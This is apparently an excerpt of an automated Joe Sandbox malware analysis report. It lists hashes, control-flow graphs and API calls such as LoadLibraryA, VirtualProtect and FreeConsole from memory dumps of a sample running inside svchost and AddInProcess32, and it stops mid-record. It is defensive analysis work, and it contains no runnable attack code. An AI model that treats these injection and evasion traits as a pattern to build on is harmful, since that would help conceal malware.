                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F001B936B101285FDF64A67DC8246BF77AAABC4300F040136D909E7348EE659C1243E1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06693888 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ba0f6d05b3775297881aded744d8f1434250846e3d44517f40a2d081767991eb
                                                                                                                                                                                                                                                    • Instruction ID: 58d28c01e4866a6e0ba4902eb3f512734de6a0002f409655ae5793811dd6c6d4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba0f6d05b3775297881aded744d8f1434250846e3d44517f40a2d081767991eb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6411CFB5D01219AFCB10DF9AD984BDEFBB8FB48310F10812AE918A7300D374A944CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06693E10 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b95e5c8fb3d9d41acea97676f0905d24b3c4806521b678e12513bc2add00bb69
                                                                                                                                                                                                                                                    • Instruction ID: 8cfcf451f2fa433c43113f761f1ec1f38cac3ce9ccf6aeece449fae3f64d6fde
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b95e5c8fb3d9d41acea97676f0905d24b3c4806521b678e12513bc2add00bb69
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4018131B101100BDF64966ED454B2FB3DEDBC9720F20883AE50EDB384DE65DC8243A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669ED90 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4f7a65f1f0afe73914885e01808770ab1438aa6235f3161a28b35254c7c4de43
                                                                                                                                                                                                                                                    • Instruction ID: fd33f77be5cb9d945da4ef1f94efad2bbbe14e80dc2b1b8f0cc677cc25c5a366
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f7a65f1f0afe73914885e01808770ab1438aa6235f3161a28b35254c7c4de43
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE018131F001144BDF65D62DD4A4B2F77DAEBC9710F508839E50ACB384DE16DC8247A5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669A308 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e4eb7bc5938a01a2bcb12cea343409dc67896f47a75d2fc9c6c9e580af3471ad
                                                                                                                                                                                                                                                    • Instruction ID: ee69d044ee8e3306e82d4b6779424eeb6a38e5b311de441a84380082a00dde87
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4eb7bc5938a01a2bcb12cea343409dc67896f47a75d2fc9c6c9e580af3471ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD014430B501144FDB64EA7DD4A0B2F73DAEB89750F508928E90ECB354EE61DC828791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06694A59 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a5c1dc1a191034664f9154faeb876ea793a7a9ce57fa2fc5ee537924a96119cc
                                                                                                                                                                                                                                                    • Instruction ID: 9ca1bf9e91f5c380307c0495a385d6e0fa35e4ce5b4c095bf0cec18f6cd4bc41
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5c1dc1a191034664f9154faeb876ea793a7a9ce57fa2fc5ee537924a96119cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DF0D431A50129DFDF54DB94E858BAEBBB6BF88711F200529E502A7388CB741C46CB95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06696469 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 21ccf67924fa78c994e38703eeb5e07eb31d27641c82074006d53ba42c5af579
                                                                                                                                                                                                                                                    • Instruction ID: b1a72e9ffadb606be95522e54f12cd7ec1db57285984e634c2274d2e1a995f63
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21ccf67924fa78c994e38703eeb5e07eb31d27641c82074006d53ba42c5af579
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6E09270D402099BDF50DFB4CA857AEB77DEB01208F2089A4D808CB202F232DA52CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:14.6%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:41
                                                                                                                                                                                                                                                    Total number of Limit Nodes:3
                                                                                                                                                                                                                                                    execution_graph 13526 7ff7c1910a58 13527 7ff7c1910a61 FreeConsole 13526->13527 13529 7ff7c1910afe 13527->13529 13516 7ff7c1913b91 13518 7ff7c1913bb1 13516->13518 13520 7ff7c1913d3c 13518->13520 13521 7ff7c1912608 13518->13521 13519 7ff7c1913f55 13523 7ff7c1912627 13521->13523 13522 7ff7c19127ef 13522->13519 13523->13522 13524 7ff7c1912930 LoadLibraryA 13523->13524 13525 7ff7c1912984 13524->13525 13525->13519 13483 7ff7c1912e84 13484 7ff7c1912e8d 13483->13484 13503 7ff7c1912780 13484->13503 13486 7ff7c1912ed3 13508 7ff7c1910618 13486->13508 13489 7ff7c1912780 LoadLibraryA 13490 7ff7c1912f09 13489->13490 13491 7ff7c1910618 LoadLibraryA 13490->13491 13492 7ff7c1912f2b 13491->13492 13493 7ff7c1912780 LoadLibraryA 13492->13493 13494 7ff7c1912f38 13493->13494 13495 7ff7c1910618 LoadLibraryA 13494->13495 13496 7ff7c1912f77 13495->13496 13497 7ff7c1912780 LoadLibraryA 13496->13497 13498 7ff7c1912f84 13497->13498 13499 7ff7c1910618 LoadLibraryA 13498->13499 13500 7ff7c1912fa6 13499->13500 13501 7ff7c1912780 LoadLibraryA 13500->13501 13502 7ff7c1912fb3 13501->13502 13506 7ff7c19127a0 13503->13506 13504 7ff7c19127ef 13504->13486 13505 7ff7c1912930 LoadLibraryA 13507 7ff7c1912984 13505->13507 13506->13504 13506->13505 13507->13486 13509 7ff7c1913000 13508->13509 13510 7ff7c1912780 LoadLibraryA 13509->13510 13511 7ff7c1912efc 13510->13511 13511->13489 13512 7ff7c1912d84 13513 7ff7c1912d8d VirtualProtect 13512->13513 13515 7ff7c1912e51 13513->13515

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF7C1912780 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 268libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000034.00000002.1668503482.00007FF7C1910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1910000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_52_2_7ff7c1910000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                                    • API String ID: 1029625771-3993045852
                                                                                                                                                                                                                                                    • Opcode ID: da46ec20af5742e8c0dd0a42d0eaa3243bf5a853139f1ff265df959d918f1bbd
                                                                                                                                                                                                                                                    • Instruction ID: c6374ab46ebd174046576eb0acc080a509728787ba66532314c33d875ec63a83
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da46ec20af5742e8c0dd0a42d0eaa3243bf5a853139f1ff265df959d918f1bbd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D81B730508A8D8FEB58EF28D8457B577E1FF59360F10427AE80DC7292DE74A885CB92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19F026B Relevance: 2.3, Strings: 1, Instructions: 1035COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 334 7ff7c19f026b-7ff7c19f026d 335 7ff7c19f03b1-7ff7c19f03b7 334->335 336 7ff7c19f026e-7ff7c19f027c 334->336 339 7ff7c19f03b9-7ff7c19f03c8 335->339 337 7ff7c19f0284-7ff7c19f0286 336->337 340 7ff7c19f02f7-7ff7c19f0306 337->340 341 7ff7c19f0288-7ff7c19f0289 337->341 343 7ff7c19f03c9-7ff7c19f0427 339->343 342 7ff7c19f0307-7ff7c19f0309 340->342 344 7ff7c19f024f-7ff7c19f026a 341->344 345 7ff7c19f028b 341->345 342->335 346 7ff7c19f030a-7ff7c19f0348 342->346 347 7ff7c19f045c-7ff7c19f0474 343->347 348 7ff7c19f0429-7ff7c19f0440 343->348 344->334 345->342 349 7ff7c19f028d 345->349 346->339 372 7ff7c19f034a-7ff7c19f034d 346->372 351 7ff7c19f04b1-7ff7c19f04d0 348->351 352 7ff7c19f0442-7ff7c19f045a 348->352 354 7ff7c19f02d4 349->354 355 7ff7c19f028f-7ff7c19f02a0 349->355 359 7ff7c19f04d1-7ff7c19f04d5 351->359 352->347 352->359 354->335 361 7ff7c19f02da-7ff7c19f02f5 354->361 365 7ff7c19f0232-7ff7c19f024e 355->365 366 7ff7c19f02a2-7ff7c19f02b8 355->366 363 7ff7c19f04d6 359->363 364 7ff7c19f04d7-7ff7c19f04e7 359->364 361->340 363->364 368 7ff7c19f051c-7ff7c19f0534 364->368 369 7ff7c19f04e9-7ff7c19f0500 364->369 365->344 366->335 370 7ff7c19f02be-7ff7c19f02d1 366->370 373 7ff7c19f0571-7ff7c19f0590 369->373 374 7ff7c19f0502-7ff7c19f051a 369->374 370->354 372->343 377 7ff7c19f034f 372->377 375 7ff7c19f0592-7ff7c19f0596 373->375 376 7ff7c19f0597-7ff7c19f05a7 373->376 374->368 375->376 379 7ff7c19f05dc-7ff7c19f05f4 376->379 380 7ff7c19f05a9-7ff7c19f05c0 376->380 381 7ff7c19f0396-7ff7c19f03b0 377->381 382 7ff7c19f0351-7ff7c19f035f 377->382 384 7ff7c19f0631-7ff7c19f0668 380->384 385 7ff7c19f05c2-7ff7c19f05da 380->385 382->381 389 7ff7c19f069d-7ff7c19f069f 384->389 390 7ff7c19f066a-7ff7c19f067a 384->390 385->379 392 7ff7c19f06a1-7ff7c19f06a8 389->392 393 7ff7c19f06c0-7ff7c19f06c5 389->393 395 7ff7c19f06eb-7ff7c19f06f8 390->395 396 7ff7c19f067c-7ff7c19f067e 390->396 401 7ff7c19f06bc-7ff7c19f06bf 392->401 402 7ff7c19f06aa-7ff7c19f06b9 392->402 398 7ff7c19f06c6-7ff7c19f06c7 393->398 399 7ff7c19f06fa-7ff7c19f073c 395->399 396->399 400 7ff7c19f0680 396->400 403 7ff7c19f0786-7ff7c19f078b 399->403 404 7ff7c19f073e-7ff7c19f0772 399->404 400->398 405 7ff7c19f0682-7ff7c19f069c 400->405 401->393 402->401 408 7ff7c19f0a42-7ff7c19f0a56 403->408 410 7ff7c19f078c-7ff7c19f079e 403->410 404->408 409 7ff7c19f0778-7ff7c19f0781 404->409 405->389 415 7ff7c19f0a57-7ff7c19f0ab7 408->415 412 7ff7c19f0782-7ff7c19f0785 409->412 411 7ff7c19f079f-7ff7c19f07bd 410->411 411->408 416 7ff7c19f07c3-7ff7c19f07d6 411->416 412->403 418 7ff7c19f0aec-7ff7c19f0b04 415->418 419 7ff7c19f0ab9-7ff7c19f0ad0 415->419 426 7ff7c19f0847-7ff7c19f0856 416->426 427 7ff7c19f07d8-7ff7c19f07d9 416->427 421 7ff7c19f0b41-7ff7c19f0b77 419->421 422 7ff7c19f0ad2-7ff7c19f0aeb 419->422 424 7ff7c19f0bac-7ff7c19f0bc4 421->424 425 7ff7c19f0b79-7ff7c19f0b90 421->425 422->418 430 7ff7c19f0c01-7ff7c19f0c37 425->430 431 7ff7c19f0b92-7ff7c19f0bab 425->431 429 7ff7c19f0857-7ff7c19f0859 426->429 427->411 432 7ff7c19f07db 427->432 429->408 435 7ff7c19f085a-7ff7c19f0872 429->435 436 7ff7c19f0c6c-7ff7c19f0c84 430->436 437 7ff7c19f0c39-7ff7c19f0c50 430->437 431->424 432->429 439 7ff7c19f07dd 432->439 451 7ff7c19f08e3-7ff7c19f08f0 435->451 452 7ff7c19f0874-7ff7c19f0877 435->452 440 7ff7c19f0cc1-7ff7c19f0cfe 437->440 441 7ff7c19f0c52-7ff7c19f0c6a 437->441 444 7ff7c19f0824 439->444 445 7ff7c19f07df-7ff7c19f07f0 439->445 441->436 444->408 450 7ff7c19f082a-7ff7c19f0845 444->450 445->412 454 7ff7c19f07f2-7ff7c19f0808 445->454 450->426 455 7ff7c19f08f3 451->455 452->455 456 7ff7c19f0879 452->456 454->408 458 7ff7c19f080e-7ff7c19f0821 454->458 455->408 462 7ff7c19f08f9-7ff7c19f090c 455->462 460 7ff7c19f08c0 456->460 461 7ff7c19f087b-7ff7c19f08a2 456->461 458->444 464 7ff7c19f08c3-7ff7c19f08e1 460->464 465 7ff7c19f08c2 460->465 461->408 467 7ff7c19f08a8-7ff7c19f08be 461->467 468 7ff7c19f097d-7ff7c19f0990 462->468 469 7ff7c19f090e-7ff7c19f0912 462->469 464->451 465->464 467->408 467->460 470 7ff7c19f0993 468->470 469->470 471 7ff7c19f0914 469->471 470->408 473 7ff7c19f0999-7ff7c19f09b5 470->473 472 7ff7c19f0974-7ff7c19f097a 471->472 472->468 476 7ff7c19f09d2-7ff7c19f09e6 473->476 477 7ff7c19f09b7-7ff7c19f09cc 473->477 476->415 478 7ff7c19f09e8-7ff7c19f09ed 476->478 477->476 478->472 480 7ff7c19f09ef 478->480 480->408
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000034.00000002.1669614294.00007FF7C19F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19F0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_52_2_7ff7c19f0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                                                    • API String ID: 0-3554254475
                                                                                                                                                                                                                                                    • Opcode ID: d0fe597f7b1dfda32afd095c2a17b33a529520f8d6c29a146dbd5d91aa094333
                                                                                                                                                                                                                                                    • Instruction ID: abf3aa0725f2193026a2f483416a3e2752aa7fcee8e1d05e6a04b1588430ad21
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0fe597f7b1dfda32afd095c2a17b33a529520f8d6c29a146dbd5d91aa094333
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F62777180DBC98FD756EF2888546A8BBA1FF56314F5802FAD089CB093DA64E809C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19F0E29 Relevance: 2.2, Strings: 1, Instructions: 951COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 481 7ff7c19f0e29-7ff7c19f0e9c 484 7ff7c19f0ee6-7ff7c19f0ee8 481->484 485 7ff7c19f0e9e-7ff7c19f0ecf 481->485 487 7ff7c19f1027-7ff7c19f1036 484->487 488 7ff7c19f0ee9-7ff7c19f0efb 484->488 486 7ff7c19f0ed5-7ff7c19f0ee5 485->486 485->487 486->484 493 7ff7c19f1038-7ff7c19f1039 487->493 489 7ff7c19f0efc-7ff7c19f0f00 488->489 491 7ff7c19f0f03-7ff7c19f0f1a 489->491 492 7ff7c19f0f02 489->492 491->487 498 7ff7c19f0f20-7ff7c19f0f33 491->498 492->491 494 7ff7c19f103b 493->494 495 7ff7c19f103c-7ff7c19f105a 493->495 494->495 497 7ff7c19f105b-7ff7c19f1067 495->497 499 7ff7c19f106b-7ff7c19f1097 497->499 503 7ff7c19f0f35-7ff7c19f0f36 498->503 504 7ff7c19f0fa4-7ff7c19f0fb3 498->504 501 7ff7c19f10cc-7ff7c19f10e4 499->501 502 7ff7c19f1099-7ff7c19f10b0 499->502 506 7ff7c19f1121-7ff7c19f1157 502->506 507 7ff7c19f10b2-7ff7c19f10ca 502->507 503->489 509 7ff7c19f0f38 503->509 511 7ff7c19f0fb4-7ff7c19f0fb6 504->511 514 7ff7c19f118c-7ff7c19f11a4 506->514 515 7ff7c19f1159-7ff7c19f1170 506->515 507->501 509->511 513 7ff7c19f0f3a 509->513 511->487 516 7ff7c19f0fb8-7ff7c19f0fea 511->516 517 7ff7c19f0f81 513->517 518 7ff7c19f0f3c-7ff7c19f0f45 513->518 519 7ff7c19f11e1-7ff7c19f1217 515->519 520 7ff7c19f1172-7ff7c19f118a 515->520 516->497 531 7ff7c19f0fec-7ff7c19f0fef 516->531 517->487 525 7ff7c19f0f87-7ff7c19f0fa2 517->525 522 7ff7c19f0f66-7ff7c19f0f7e 518->522 523 7ff7c19f0f47-7ff7c19f0f65 518->523 533 7ff7c19f124c-7ff7c19f1264 519->533 534 7ff7c19f1219-7ff7c19f1230 519->534 520->514 522->517 523->487 523->522 525->504 531->499 535 7ff7c19f0ff1 531->535 536 7ff7c19f12a1-7ff7c19f12c5 534->536 537 7ff7c19f1232-7ff7c19f124a 534->537 535->493 538 7ff7c19f0ff3-7ff7c19f1026 535->538 542 7ff7c19f12c6 536->542 543 7ff7c19f12c7-7ff7c19f12cd 536->543 537->533 542->543 545 7ff7c19f12cf-7ff7c19f12e9 543->545 546 7ff7c19f12ce 543->546 548 7ff7c19f12fd-7ff7c19f12fe 545->548 549 7ff7c19f12eb-7ff7c19f12fb 545->549 546->545 550 7ff7c19f1301-7ff7c19f1318 548->550 549->550 554 7ff7c19f134b-7ff7c19f13c9 550->554 555 7ff7c19f131a-7ff7c19f131c 550->555 561 7ff7c19f1413-7ff7c19f1444 554->561 562 7ff7c19f13cb-7ff7c19f13f9 554->562 555->554 556 7ff7c19f131e-7ff7c19f1344 555->556 556->554 564 7ff7c19f14a5-7ff7c19f14b5 561->564 566 7ff7c19f1446-7ff7c19f1460 561->566 562->564 565 7ff7c19f13ff-7ff7c19f1412 562->565 570 7ff7c19f14b7 564->570 571 7ff7c19f14b8-7ff7c19f1508 564->571 565->561 565->564 566->564 570->571 574 7ff7c19f151f-7ff7c19f1530 571->574 575 7ff7c19f150a-7ff7c19f1517 571->575 578 7ff7c19f15a1-7ff7c19f15c5 574->578 579 7ff7c19f1532-7ff7c19f154a 574->579 576 7ff7c19f154c-7ff7c19f1564 575->576 577 7ff7c19f1519-7ff7c19f151d 575->577 577->574 582 7ff7c19f15c6 578->582 583 7ff7c19f15c7-7ff7c19f15d8 578->583 579->576 582->583 585 7ff7c19f160d-7ff7c19f1618 583->585 586 7ff7c19f15da-7ff7c19f15ea 583->586 590 7ff7c19f162c-7ff7c19f1639 585->590 591 7ff7c19f161a-7ff7c19f162b 585->591 588 7ff7c19f165b-7ff7c19f1669 586->588 589 7ff7c19f15ec-7ff7c19f15ee 586->589 592 7ff7c19f166a-7ff7c19f1713 588->592 589->592 593 7ff7c19f15f0-7ff7c19f160c 589->593 591->590 604 7ff7c19f1715-7ff7c19f1726 592->604 605 7ff7c19f1727-7ff7c19f1731 592->605 593->585 604->605
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000034.00000002.1669614294.00007FF7C19F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19F0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_52_2_7ff7c19f0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 86yn
                                                                                                                                                                                                                                                    • API String ID: 0-1623857296
                                                                                                                                                                                                                                                    • Opcode ID: 914c2b09898f6af413eaf1ab696c9a9b88c6a7b654ad918a64baf538d3b9772b
                                                                                                                                                                                                                                                    • Instruction ID: e58ad9bcd6d7012be99df9f41969266004ecc996c6bc2ad7861378b967d9c6cc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 914c2b09898f6af413eaf1ab696c9a9b88c6a7b654ad918a64baf538d3b9772b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD52493190DAC95FD756EF2888655A4BFF0FF67314B4902FEC489CB1A3D968A806C391
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1912D84 Relevance: 1.6, APIs: 1, Instructions: 129memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1422 7ff7c1912d84-7ff7c1912d8b 1423 7ff7c1912d8d-7ff7c1912d95 1422->1423 1424 7ff7c1912d96-7ff7c1912e4f VirtualProtect 1422->1424 1423->1424 1427 7ff7c1912e57-7ff7c1912e7f 1424->1427 1428 7ff7c1912e51 1424->1428 1428->1427
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000034.00000002.1668503482.00007FF7C1910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1910000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_52_2_7ff7c1910000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: cee19c878404196fa64880105d5253f738cd799055b153ad957e8ba290fc64db
                                                                                                                                                                                                                                                    • Instruction ID: 864dee4169b962584deec46448f0fe4fee9af4ace1daf3276ba3dce1e2d69e41
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cee19c878404196fa64880105d5253f738cd799055b153ad957e8ba290fc64db
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F931C93190CA4C5FDB08EF9898466F9BBF1EB56321F14426FD049C3292DB746856CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1910A58 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1429 7ff7c1910a58-7ff7c1910a5f 1430 7ff7c1910a6a-7ff7c1910afc FreeConsole 1429->1430 1431 7ff7c1910a61-7ff7c1910a69 1429->1431 1434 7ff7c1910afe 1430->1434 1435 7ff7c1910b04-7ff7c1910b2b 1430->1435 1431->1430 1434->1435
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000034.00000002.1668503482.00007FF7C1910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1910000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_52_2_7ff7c1910000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 771614528-0
                                                                                                                                                                                                                                                    • Opcode ID: dc33f3eaadc61e83dd2757b5b551f702aa70f48fb5430bf048a4c7ed8fa5eaf6
                                                                                                                                                                                                                                                    • Instruction ID: 83c077a2e934a72b8a345584a9d92e9a7799d52a35314723ce5b3cbf9aa7ba86
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc33f3eaadc61e83dd2757b5b551f702aa70f48fb5430bf048a4c7ed8fa5eaf6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B31C57190CB4C8FDB19DFA9D8497EABBF0EB56321F00426ED089C3192DA74B455CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19F1269 Relevance: .2, Instructions: 226COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000034.00000002.1669614294.00007FF7C19F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19F0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
